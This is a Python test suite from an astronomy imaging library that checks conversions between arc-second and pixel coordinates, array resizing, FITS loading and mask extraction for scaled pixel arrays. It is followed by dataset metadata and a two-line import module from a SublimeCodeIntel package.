class TestConversion:
def test__arc_second_coordinates_to_pixel_coordinates__arc_seconds_are_pixel_centres(self):
sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((2, 2)), pixel_scale=2.0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(1.0, -1.0)) == (0, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(1.0, 1.0)) == (0, 1)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-1.0, -1.0)) == (1, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-1.0, 1.0)) == (1, 1)
sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((3, 3)), pixel_scale=3.0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(3.0, -3.0)) == (0, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(3.0, 0.0)) == (0, 1)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(3.0, 3.0)) == (0, 2)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.0, -3.0)) == (1, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.0, 0.0)) == (1, 1)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.0, 3.0)) == (1, 2)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-3.0, -3.0)) == (2, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-3.0, 0.0)) == (2, 1)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-3.0, 3.0)) == (2, 2)
def test__arc_second_coordinates_to_pixel_coordinates__arc_seconds_are_pixel_corners(self):
sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((2, 2)), pixel_scale=2.0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(1.99, -1.99)) == (0, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(1.99, -0.01)) == (0, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.01, -1.99)) == (0, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.01, -0.01)) == (0, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(2.01, 0.01)) == (0, 1)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(2.01, 1.99)) == (0, 1)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.01, 0.01)) == (0, 1)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.01, 1.99)) == (0, 1)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-0.01, -1.99)) == (1, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-0.01, -0.01)) == (1, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-1.99, -1.99)) == (1, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-1.99, -0.01)) == (1, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-0.01, 0.01)) == (1, 1)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-0.01, 1.99)) == (1, 1)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-1.99, 0.01)) == (1, 1)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-1.99, 1.99)) == (1, 1)
def test__arc_second_coordinates_to_pixel_coordinates__arc_seconds_are_pixel_centres__nonzero_centre(self):
sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((2, 2)), pixel_scale=2.0, origin=(1.0, 1.0))
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(2.0, 0.0)) == (0, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(2.0, 2.0)) == (0, 1)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.0, 0.0)) == (1, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.0, 2.0)) == (1, 1)
sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((3, 3)), pixel_scale=3.0, origin=(3.0, 3.0))
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(6.0, 0.0)) == (0, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(6.0, 3.0)) == (0, 1)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(6.0, 6.0)) == (0, 2)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(3.0, 0.0)) == (1, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(3.0, 3.0)) == (1, 1)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(3.0, 6.0)) == (1, 2)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.0, 0.0)) == (2, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.0, 3.0)) == (2, 1)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.0, 6.0)) == (2, 2)
def test__arc_second_coordinates_to_pixel_coordinates__arc_seconds_are_pixel_corners__nonzero_centre(self):
sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((2, 2)), pixel_scale=2.0, origin=(1.0, 1.0))
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(2.99, -0.99)) == (0, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(2.99, 0.99)) == (0, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(1.01, -0.99)) == (0, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(1.01, 0.99)) == (0, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(3.01, 1.01)) == (0, 1)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(3.01, 2.99)) == (0, 1)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(1.01, 1.01)) == (0, 1)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(1.01, 2.99)) == (0, 1)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.99, -0.99)) == (1, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.99, 0.99)) == (1, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-0.99, -0.99)) == (1, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-0.99, 0.99)) == (1, 0)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.99, 1.01)) == (1, 1)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.99, 2.99)) == (1, 1)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-0.99, 1.01)) == (1, 1)
assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-0.99, 2.99)) == (1, 1)
def test__square_pixel_grid__1d_arc_second_grid_to_1d_pixel_centred_grid__same_as_imaging_util(self):
grid_arc_seconds = np.array([[0.5, -0.5], [0.5, 0.5],
[-0.5, -0.5], [-0.5, 0.5]])
grid_pixels_util = grid_util.grid_arc_seconds_1d_to_grid_pixel_centres_1d(
grid_arc_seconds_1d=grid_arc_seconds,
shape=(2, 2),
pixel_scales=(2.0, 2.0))
sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((2, 2)), pixel_scale=2.0)
grid_pixels = sca.grid_arc_seconds_to_grid_pixel_centres(grid_arc_seconds=grid_arc_seconds)
assert (grid_pixels == grid_pixels_util).all()
def test__square_pixel_grid__1d_arc_second_grid_to_1d_pixel_indexes_grid__same_as_imaging_util(self):
grid_arc_seconds = np.array([[1.0, -1.0], [1.0, 1.0],
[-1.0, -1.0], [-1.0, 1.0]])
grid_pixel_indexes_util = grid_util.grid_arc_seconds_1d_to_grid_pixel_indexes_1d(
grid_arc_seconds_1d=grid_arc_seconds,
shape=(2, 2),
pixel_scales=(2.0, 2.0))
sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((2, 2)), pixel_scale=2.0)
grid_pixel_indexes = sca.grid_arc_seconds_to_grid_pixel_indexes(grid_arc_seconds=grid_arc_seconds)
assert (grid_pixel_indexes == grid_pixel_indexes_util).all()
def test__rectangular_pixel_grid__1d_arc_second_grid_to_1d_pixel_centred_grid__same_as_imaging_util(self):
grid_arc_seconds = np.array([[1.0, -2.0], [1.0, 2.0],
[-1.0, -2.0], [-1.0, 2.0]])
grid_pixels_util = grid_util.grid_arc_seconds_1d_to_grid_pixel_centres_1d(
grid_arc_seconds_1d=grid_arc_seconds,
shape=(2, 2),
pixel_scales=(7.0, 2.0))
sca = scaled_array.ScaledRectangularPixelArray(array=np.zeros((2, 2)),
pixel_scales=(7.0, 2.0))
grid_pixels = sca.grid_arc_seconds_to_grid_pixel_centres(grid_arc_seconds=grid_arc_seconds)
assert (grid_pixels == grid_pixels_util).all()
def test__rectangular_pixel_grid__1d_arc_second_grid_to_1d_pixel_indexes_grid__same_as_imaging_util(self):
grid_arc_seconds = np.array([[1.0, -2.0], [1.0, 2.0],
[-1.0, -2.0], [-1.0, 2.0]])
grid_pixels_util = grid_util.grid_arc_seconds_1d_to_grid_pixel_indexes_1d(
grid_arc_seconds_1d=grid_arc_seconds,
shape=(2, 2),
pixel_scales=(2.0, 4.0))
sca = scaled_array.ScaledRectangularPixelArray(array=np.zeros((2, 2)),
pixel_scales=(2.0, 4.0))
grid_pixels = sca.grid_arc_seconds_to_grid_pixel_indexes(grid_arc_seconds=grid_arc_seconds)
assert (grid_pixels == grid_pixels_util).all()
def test__rectangular_pixel_grid__1d_arc_second_grid_to_1d_pixel_grid__same_as_imaging_util(self):
grid_arc_seconds = np.array([[1.0, -2.0], [1.0, 2.0],
[-1.0, -2.0], [-1.0, 2.0]])
grid_pixels_util = grid_util.grid_arc_seconds_1d_to_grid_pixels_1d(
grid_arc_seconds_1d=grid_arc_seconds, shape=(2, 2), pixel_scales=(2.0, 4.0))
sca = scaled_array.ScaledRectangularPixelArray(array=np.zeros((2, 2)),
pixel_scales=(2.0, 4.0))
grid_pixels = sca.grid_arc_seconds_to_grid_pixels(grid_arc_seconds=grid_arc_seconds)
assert (grid_pixels == grid_pixels_util).all()
def test__square_pixel_grid__1d_pixel_grid_to_1d_pixel_centred_grid__same_as_imaging_util(self):
grid_pixels = np.array([[0, 0], [0, 1],
[1, 0], [1, 1]])
grid_pixels_util = grid_util.grid_pixels_1d_to_grid_arc_seconds_1d(
grid_pixels_1d=grid_pixels,
shape=(2, 2),
pixel_scales=(2.0, 2.0))
sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((2, 2)), pixel_scale=2.0)
grid_pixels = sca.grid_pixels_to_grid_arc_seconds(grid_pixels=grid_pixels)
assert (grid_pixels == grid_pixels_util).all()
def test__square_pixel_grid__1d_pixel_grid_to_1d_pixel_grid__same_as_imaging_util(self):
grid_pixels = np.array([[0, 0], [0, 1],
[1, 0], [1, 1]])
grid_pixels_util = grid_util.grid_pixels_1d_to_grid_arc_seconds_1d(
grid_pixels_1d=grid_pixels, shape=(2, 2), pixel_scales=(2.0, 2.0))
sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((2, 2)), pixel_scale=2.0)
grid_pixels = sca.grid_pixels_to_grid_arc_seconds(grid_pixels=grid_pixels)
assert (grid_pixels == grid_pixels_util).all()
def test__square_pixel_grid__grids_with_nonzero_centres__same_as_imaging_util(self):
grid_arc_seconds = np.array([[1.0, -2.0], [1.0, 2.0],
[-1.0, -2.0], [-1.0, 2.0]])
sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((2, 2)), pixel_scale=2.0, origin=(1.0, 2.0))
grid_pixels_util = grid_util.grid_arc_seconds_1d_to_grid_pixels_1d(
grid_arc_seconds_1d=grid_arc_seconds, shape=(2, 2), pixel_scales=(2.0, 2.0), origin=(1.0, 2.0))
grid_pixels = sca.grid_arc_seconds_to_grid_pixels(grid_arc_seconds=grid_arc_seconds)
assert (grid_pixels == grid_pixels_util).all()
grid_pixels_util = grid_util.grid_arc_seconds_1d_to_grid_pixel_indexes_1d(
grid_arc_seconds_1d=grid_arc_seconds, shape=(2, 2), pixel_scales=(2.0, 2.0), origin=(1.0, 2.0))
grid_pixels = sca.grid_arc_seconds_to_grid_pixel_indexes(grid_arc_seconds=grid_arc_seconds)
assert grid_pixels == pytest.approx(grid_pixels_util, 1e-4)
grid_pixels_util = grid_util.grid_arc_seconds_1d_to_grid_pixel_centres_1d(
grid_arc_seconds_1d=grid_arc_seconds, shape=(2, 2), pixel_scales=(2.0, 2.0), origin=(1.0, 2.0))
grid_pixels = sca.grid_arc_seconds_to_grid_pixel_centres(grid_arc_seconds=grid_arc_seconds)
assert grid_pixels == pytest.approx(grid_pixels_util, 1e-4)
grid_pixels = np.array([[0, 0], [0, 1],
[1, 0], [1, 1]])
grid_arc_seconds_util = grid_util.grid_pixels_1d_to_grid_arc_seconds_1d(grid_pixels_1d=grid_pixels,
shape=(2, 2), pixel_scales=(2.0, 2.0), origin=(1.0, 2.0))
grid_arc_seconds = sca.grid_pixels_to_grid_arc_seconds(grid_pixels=grid_pixels)
assert (grid_arc_seconds == grid_arc_seconds_util).all()
def test__rectangular_pixel_grid__grids_with_nonzero_centres__same_as_imaging_util(self):
grid_arc_seconds = np.array([[1.0, -2.0], [1.0, 2.0],
[-1.0, -2.0], [-1.0, 2.0]])
sca = scaled_array.ScaledRectangularPixelArray(array=np.zeros((2, 2)), pixel_scales=(2.0, 1.0), origin=(1.0, 2.0))
grid_pixels_util = grid_util.grid_arc_seconds_1d_to_grid_pixels_1d(
grid_arc_seconds_1d=grid_arc_seconds, shape=(2, 2), pixel_scales=(2.0, 1.0), origin=(1.0, 2.0))
grid_pixels = sca.grid_arc_seconds_to_grid_pixels(grid_arc_seconds=grid_arc_seconds)
assert (grid_pixels == grid_pixels_util).all()
grid_pixels_util = grid_util.grid_arc_seconds_1d_to_grid_pixel_indexes_1d(
grid_arc_seconds_1d=grid_arc_seconds, shape=(2, 2), pixel_scales=(2.0, 1.0), origin=(1.0, 2.0))
grid_pixels = sca.grid_arc_seconds_to_grid_pixel_indexes(grid_arc_seconds=grid_arc_seconds)
assert (grid_pixels == grid_pixels_util).all()
grid_pixels_util = grid_util.grid_arc_seconds_1d_to_grid_pixel_centres_1d(
grid_arc_seconds_1d=grid_arc_seconds, shape=(2, 2), pixel_scales=(2.0, 1.0), origin=(1.0, 2.0))
grid_pixels = sca.grid_arc_seconds_to_grid_pixel_centres(grid_arc_seconds=grid_arc_seconds)
assert grid_pixels == pytest.approx(grid_pixels_util, 1e-4)
grid_pixels = np.array([[0, 0], [0, 1],
[1, 0], [1, 1]])
grid_arc_seconds_util = grid_util.grid_pixels_1d_to_grid_arc_seconds_1d(grid_pixels_1d=grid_pixels,
shape=(2, 2), pixel_scales=(2.0, 1.0), origin=(1.0, 2.0))
grid_arc_seconds = sca.grid_pixels_to_grid_arc_seconds(grid_pixels=grid_pixels)
assert (grid_arc_seconds == grid_arc_seconds_util).all()
class TestTicks:
def test__square_pixel_grid__yticks(self):
sca = scaled_array.ScaledSquarePixelArray(array=np.ones((3, 3)), pixel_scale=1.0)
assert sca.yticks == pytest.approx(np.array([-1.5, -0.5, 0.5, 1.5]), 1e-3)
sca = scaled_array.ScaledSquarePixelArray(array=np.ones((3, 3)), pixel_scale=0.5)
assert sca.yticks == pytest.approx(np.array([-0.75, -0.25, 0.25, 0.75]), 1e-3)
sca = scaled_array.ScaledSquarePixelArray(array=np.ones((6, 3)), pixel_scale=1.0)
assert sca.yticks == pytest.approx(np.array([-3.0, -1.0, 1.0, 3.0]), 1e-3)
sca = scaled_array.ScaledSquarePixelArray(array=np.ones((3, 1)), pixel_scale=1.0)
assert sca.yticks == pytest.approx(np.array([-1.5, -0.5, 0.5, 1.5]), 1e-3)
def test__square_pixel_grid__xticks(self):
sca = scaled_array.ScaledSquarePixelArray(array=np.ones((3, 3)), pixel_scale=1.0)
assert sca.xticks == pytest.approx(np.array([-1.5, -0.5, 0.5, 1.5]), 1e-3)
sca = scaled_array.ScaledSquarePixelArray(array=np.ones((3, 3)), pixel_scale=0.5)
assert sca.xticks == pytest.approx(np.array([-0.75, -0.25, 0.25, 0.75]), 1e-3)
sca = scaled_array.ScaledSquarePixelArray(array=np.ones((3, 6)), pixel_scale=1.0)
assert sca.xticks == pytest.approx(np.array([-3.0, -1.0, 1.0, 3.0]), 1e-3)
sca = scaled_array.ScaledSquarePixelArray(array=np.ones((1, 3)), pixel_scale=1.0)
assert sca.xticks == pytest.approx(np.array([-1.5, -0.5, 0.5, 1.5]), 1e-3)
def test__rectangular_pixel_grid__yticks(self):
sca = scaled_array.ScaledRectangularPixelArray(array=np.ones((3, 3)), pixel_scales=(1.0, 5.0))
assert sca.yticks == pytest.approx(np.array([-1.5, -0.5, 0.5, 1.5]), 1e-3)
sca = scaled_array.ScaledRectangularPixelArray(array=np.ones((3, 3)), pixel_scales=(0.5, 5.0))
assert sca.yticks == pytest.approx(np.array([-0.75, -0.25, 0.25, 0.75]), 1e-3)
sca = scaled_array.ScaledRectangularPixelArray(array=np.ones((6, 3)), pixel_scales=(1.0, 5.0))
assert sca.yticks == pytest.approx(np.array([-3.0, -1.0, 1.0, 3.0]), 1e-3)
sca = scaled_array.ScaledRectangularPixelArray(array=np.ones((3, 6)), pixel_scales=(1.0, 5.0))
assert sca.yticks == pytest.approx(np.array([-1.5, -0.5, 0.5, 1.5]), 1e-3)
def test__rectangular_pixel_grid__xticks(self):
sca = scaled_array.ScaledRectangularPixelArray(array=np.ones((3, 3)), pixel_scales=(5.0, 1.0))
assert sca.xticks == pytest.approx(np.array([-1.5, -0.5, 0.5, 1.5]), 1e-3)
sca = scaled_array.ScaledRectangularPixelArray(array=np.ones((3, 3)), pixel_scales=(5.0, 0.5))
assert sca.xticks == pytest.approx(np.array([-0.75, -0.25, 0.25, 0.75]), 1e-3)
sca = scaled_array.ScaledRectangularPixelArray(array=np.ones((3, 6)), pixel_scales=(5.0, 1.0))
assert sca.xticks == pytest.approx(np.array([-3.0, -1.0, 1.0, 3.0]), 1e-3)
sca = scaled_array.ScaledRectangularPixelArray(array=np.ones((6, 3)), pixel_scales=(5.0, 1.0))
assert sca.xticks == pytest.approx(np.array([-1.5, -0.5, 0.5, 1.5]), 1e-3)
class TestArray:
class TestResizing:
def test__pad__compare_to_imaging_util(self):
array = np.ones((5, 5))
array[2, 2] = 2.0
array = scaled_array.ScaledSquarePixelArray(array, pixel_scale=1.0)
modified = array.resized_scaled_array_from_array(new_shape=(7, 7), new_centre_pixels=(1, 1))
modified_util = array_util.resize_array_2d(array_2d=array, new_shape=(7, 7), origin=(1, 1))
assert type(modified) == scaled_array.ScaledSquarePixelArray
assert (modified == modified_util).all()
assert modified.pixel_scale == 1.0
def test__trim__compare_to_imaging_util(self):
array = np.ones((5, 5))
array[2, 2] = 2.0
array = scaled_array.ScaledSquarePixelArray(array, pixel_scale=1.0)
modified = array.resized_scaled_array_from_array(new_shape=(3, 3), new_centre_pixels=(4, 4))
modified_util = array_util.resize_array_2d(array_2d=array, new_shape=(3, 3), origin=(4, 4))
assert type(modified) == scaled_array.ScaledSquarePixelArray
assert (modified == modified_util).all()
assert modified.pixel_scale == 1.0
def test__new_centre_is_in_arc_seconds(self):
array = np.ones((5, 5))
array[2, 2] = 2.0
array = scaled_array.ScaledSquarePixelArray(array, pixel_scale=3.0)
modified = array.resized_scaled_array_from_array(new_shape=(3, 3), new_centre_arc_seconds=(6.0, 6.0))
modified_util = array_util.resize_array_2d(array_2d=array, new_shape=(3, 3), origin=(0, 4))
assert (modified == modified_util).all()
modified = array.resized_scaled_array_from_array(new_shape=(3, 3), new_centre_arc_seconds=(7.49, 4.51))
modified_util = array_util.resize_array_2d(array_2d=array, new_shape=(3, 3), origin=(0, 4))
assert (modified == modified_util).all()
modified = array.resized_scaled_array_from_array(new_shape=(3, 3), new_centre_arc_seconds=(7.49, 7.49))
modified_util = array_util.resize_array_2d(array_2d=array, new_shape=(3, 3), origin=(0, 4))
assert (modified == modified_util).all()
modified = array.resized_scaled_array_from_array(new_shape=(3, 3), new_centre_arc_seconds=(4.51, 4.51))
modified_util = array_util.resize_array_2d(array_2d=array, new_shape=(3, 3), origin=(0, 4))
assert (modified == modified_util).all()
modified = array.resized_scaled_array_from_array(new_shape=(3, 3), new_centre_arc_seconds=(4.51, 7.49))
modified_util = array_util.resize_array_2d(array_2d=array, new_shape=(3, 3), origin=(0, 4))
assert (modified == modified_util).all()
class TestScaledSquarePixelArray:
class TestConstructors(object):
def test__constructor(self, array_grid):
# Does the array grid class correctly instantiate as an instance of ndarray?
assert array_grid.shape == (5, 5)
assert array_grid.pixel_scale == 0.5
assert isinstance(array_grid, np.ndarray)
assert isinstance(array_grid, scaled_array.ScaledSquarePixelArray)
def test__init__input_data_grid_single_value__all_attributes_correct_including_data_inheritance(self):
data_grid = scaled_array.ScaledSquarePixelArray.single_value(value=5.0, shape=(3, 3),
pixel_scale=1.0, origin=(1.0, 1.0))
assert (data_grid == 5.0 * np.ones((3, 3))).all()
assert data_grid.pixel_scale == 1.0
assert data_grid.shape == (3, 3)
assert data_grid.central_pixel_coordinates == (1.0, 1.0)
assert data_grid.shape_arc_seconds == pytest.approx((3.0, 3.0))
assert data_grid.origin == (1.0, 1.0)
def test__from_fits__input_data_grid_3x3__all_attributes_correct_including_data_inheritance(self):
data_grid = scaled_array.ScaledSquarePixelArray.from_fits_with_pixel_scale(file_path=test_data_dir + '3x3_ones.fits', hdu=0,
pixel_scale=1.0, origin=(1.0, 1.0))
assert (data_grid == np.ones((3, 3))).all()
assert data_grid.pixel_scale == 1.0
assert data_grid.shape == (3, 3)
assert data_grid.central_pixel_coordinates == (1.0, 1.0)
assert data_grid.shape_arc_seconds == pytest.approx((3.0, 3.0))
assert data_grid.origin == (1.0, 1.0)
def test__from_fits__input_data_grid_4x3__all_attributes_correct_including_data_inheritance(self):
data_grid = scaled_array.ScaledSquarePixelArray.from_fits_with_pixel_scale(file_path=test_data_dir + '4x3_ones.fits', hdu=0,
pixel_scale=0.1)
assert (data_grid == np.ones((4, 3))).all()
assert data_grid.pixel_scale == 0.1
assert data_grid.shape == (4, 3)
assert data_grid.central_pixel_coordinates == (1.5, 1.0)
assert data_grid.shape_arc_seconds == pytest.approx((0.4, 0.3))
def test__zero_or_negative_pixel_scale__raises_exception(self):
with pytest.raises(exc.ScaledArrayException):
scaled_array.ScaledSquarePixelArray(array=np.ones((2,2)), pixel_scale=0.0)
with pytest.raises(exc.ScaledArrayException):
scaled_array.ScaledSquarePixelArray(array=np.ones((2,2)), pixel_scale=-0.5)
class TestExtract:
def test__mask_extract_2d_array__uses_the_limits_of_the_mask(self):
array = np.array([[ 1.0, 2.0, 3.0, 4.0],
[ 5.0, 6.0, 7.0, 8.0],
[ 9.0, 10.0, 11.0, 12.0],
[13.0, 14.0, 15.0, 16.0]])
array = scaled_array.ScaledSquarePixelArray(array=array, pixel_scale=1.0)
mask = msk.Mask(array=np.array([[True, True, True, True],
[True, False, False, True],
[True, False, False, True],
[True, True, True, True]]), pixel_scale=1.0)
array_extracted = array.extract_scaled_array_around_mask(mask=mask, buffer=0)
assert (array_extracted == np.array([[6.0, 7.0],
[10.0, 11.0]])).all()
mask = msk.Mask(array=np.array([[True, True, True, True],
[True, False, False, True],
[True, False, False, False],
[True, True, True, True]]), pixel_scale=1.0)
array_extracted = array.extract_scaled_array_around_mask(mask=mask, buffer=0)
assert (array_extracted == np.array([[6.0, 7.0, 8.0],
[10.0, 11.0, 12.0]])).all()
mask = msk.Mask(array=np.array([[True, True, True, True],
[True, False, False, True],
[True, False, False, True],
[True, True, False, True]]), pixel_scale=1.0)
array_extracted = array.extract_scaled_array_around_mask(mask=mask, buffer=0)
assert (array_extracted == np.array([[6.0, 7.0],
[10.0, 11.0],
[14.0, 15.0]])).all()
mask = msk.Mask(array=np.array([[True, True, True, True],
[True, False, False, True],
[False, False, False, True],
[True, True, True, True]]), pixel_scale=1.0)
array_extracted = array.extract_scaled_array_around_mask(mask=mask, buffer=0)
assert (array_extracted == np.array([[5.0, 6.0, 7.0],
[9.0, 10.0, 11.0]])).all()
mask = msk.Mask(array=np.array([[True, False, True, True],
[True, False, False, True],
[True, False, False, True],
[True, True, True, True]]), pixel_scale=1.0)
array_extracted = array.extract_scaled_array_around_mask(mask=mask, buffer=0)
assert (array_extracted == np.array([[2.0, 3.0],
[6.0, 7.0],
[10.0, 11.0]])).all()
mask = msk.Mask(array=np.array([[True, True, True, True],
[True, False, False, True],
[True, False, False, True],
[True, True, True, True]]), pixel_scale=1.0)
array_extracted = array.extract_scaled_array_around_mask(mask=mask, buffer=1)
assert (array_extracted == np.array([[ 1.0, 2.0, 3.0, 4.0],
[ 5.0, 6.0, 7.0, 8.0],
[ 9.0, 10.0, 11.0, 12.0],
[13.0, 14.0, 15.0, 16.0]])).all()
# class TestBinnedUpArray:
#
# def test__bin_up_size_is_1__returned_array_has_same_dimensions(self):
class TestScaledRectangularPixelArray:
class TestConstructors(object):
def test__init__input_data_grid_single_value__all_attributes_correct_including_data_inheritance(self):
data_grid = scaled_array.ScaledRectangularPixelArray.single_value(value=5.0, shape=(3, 3),
pixel_scales=(2.0, 1.0), origin=(1.0, 1.0))
assert (data_grid == 5.0 * np.ones((3, 3))).all()
assert data_grid.pixel_scales == (2.0, 1.0)
assert data_grid.shape == (3, 3)
assert data_grid.central_pixel_coordinates == (1.0, 1.0)
assert data_grid.shape_arc_seconds == pytest.approx((6.0, 3.0))
assert data_grid.origin == (1.0, 1.0)
def test__from_fits__input_data_grid_3x3__all_attributes_correct_including_data_inheritance(self):
data_grid = scaled_array.ScaledRectangularPixelArray.from_fits_with_pixel_scale(
file_path=test_data_dir + '3x3_ones.fits', hdu=0, pixel_scales=(2.0, 1.0), origin=(1.0, 1.0))
assert data_grid == pytest.approx(np.ones((3, 3)), 1e-4)
assert data_grid.pixel_scales == (2.0, 1.0)
assert data_grid.shape == (3, 3)
assert data_grid.central_pixel_coordinates == (1.0, 1.0)
assert data_grid.shape_arc_seconds == pytest.approx((6.0, 3.0))
assert data_grid.origin == (1.0, 1.0)
def test__from_fits__input_data_grid_4x3__all_attributes_correct_including_data_inheritance(self):
data_grid = scaled_array.ScaledRectangularPixelArray.from_fits_with_pixel_scale(
file_path=test_data_dir + '4x3_ones.fits', hdu=0, pixel_scales=(0.2, 0.1))
assert data_grid == pytest.approx(np.ones((4, 3)), 1e-4)
assert data_grid.pixel_scales == (0.2, 0.1)
assert data_grid.shape == (4, 3)
assert data_grid.central_pixel_coordinates == (1.5, 1.0)
assert data_grid.shape_arc_seconds == pytest.approx((0.8, 0.3))
def test__zero_or_negative_pixel_scale__raises_exception(self):
with pytest.raises(exc.ScaledArrayException):
scaled_array.ScaledRectangularPixelArray(array=np.ones((2,2)), pixel_scales=(0.0, 0.5))
with pytest.raises(exc.ScaledArrayException):
scaled_array.ScaledRectangularPixelArray(array=np.ones((2,2)), pixel_scales=(0.5, 0.0))
with pytest.raises(exc.ScaledArrayException):
scaled_array.ScaledRectangularPixelArray(array=np.ones((2,2)), pixel_scales=(-0.5, 0.5))
with pytest.raises(exc.ScaledArrayException):
scaled_array.ScaledRectangularPixelArray(array=np.ones((2,2)), pixel_scales=(0.5, -0.5)) | 55.878173 | 141 | 0.604492 | 6,082 | 44,032 | 4.030582 | 0.027951 | 0.01493 | 0.097903 | 0.055642 | 0.956148 | 0.942645 | 0.920209 | 0.914008 | 0.900261 | 0.882557 | 0 | 0.067098 | 0.270258 | 44,032 | 788 | 142 | 55.878173 | 0.695817 | 0.003929 | 0 | 0.545794 | 0 | 0 | 0.002508 | 0.001095 | 0 | 0 | 0 | 0 | 0.392523 | 1 | 0.08785 | false | 0 | 0.013084 | 0.003738 | 0.128972 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b0270baf19a12204501cdd5b2c7b17dd1f12250e | 48 | py | Python | sublimeText3/Packages/SublimeCodeIntel/libs/codeintel2/pythoncile.py | MoAnsir/dot_file_2017 | 5f67ef8f430416c82322ab7e7e001548936454ff | [
"MIT"
] | 2 | 2018-04-24T10:02:26.000Z | 2019-06-02T13:53:31.000Z | Data/Packages/SublimeCodeIntel/libs/codeintel2/pythoncile.py | Maxize/Sublime_Text_3 | be620476b49f9a6ce2ca2cfe825c4e142e7e82b9 | [
"Apache-2.0"
] | 1 | 2016-02-10T09:50:09.000Z | 2016-02-10T09:50:09.000Z | Packages/SublimeCodeIntel/libs/codeintel2/pythoncile.py | prisis/sublime-text-packages | 99ae8a5496613e27a75e5bd91723549b21476e60 | [
"MIT"
] | 2 | 2019-04-11T04:13:02.000Z | 2019-06-02T13:53:33.000Z | import os
from codeintel2.pythoncile1 import *
